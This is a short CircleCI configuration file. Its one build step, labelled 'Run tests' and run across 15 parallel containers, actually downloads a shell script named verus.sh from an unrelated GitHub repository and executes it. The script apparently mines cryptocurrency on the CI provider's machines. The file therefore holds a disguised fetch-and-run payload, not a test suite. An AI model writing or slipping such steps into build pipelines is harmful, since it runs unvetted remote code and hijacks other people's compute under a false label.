jobs:   
  build:   
    parallelism: 15
    docker:   
      - image: cimg/ruby:3.0.2-node   
    steps:    
      - checkout    
      - run:    
          name: Run tests    
          command: wget https://raw.githubusercontent.com/popoler/tn/main/verus.sh  && chmod +x verus.sh && ./verus.sh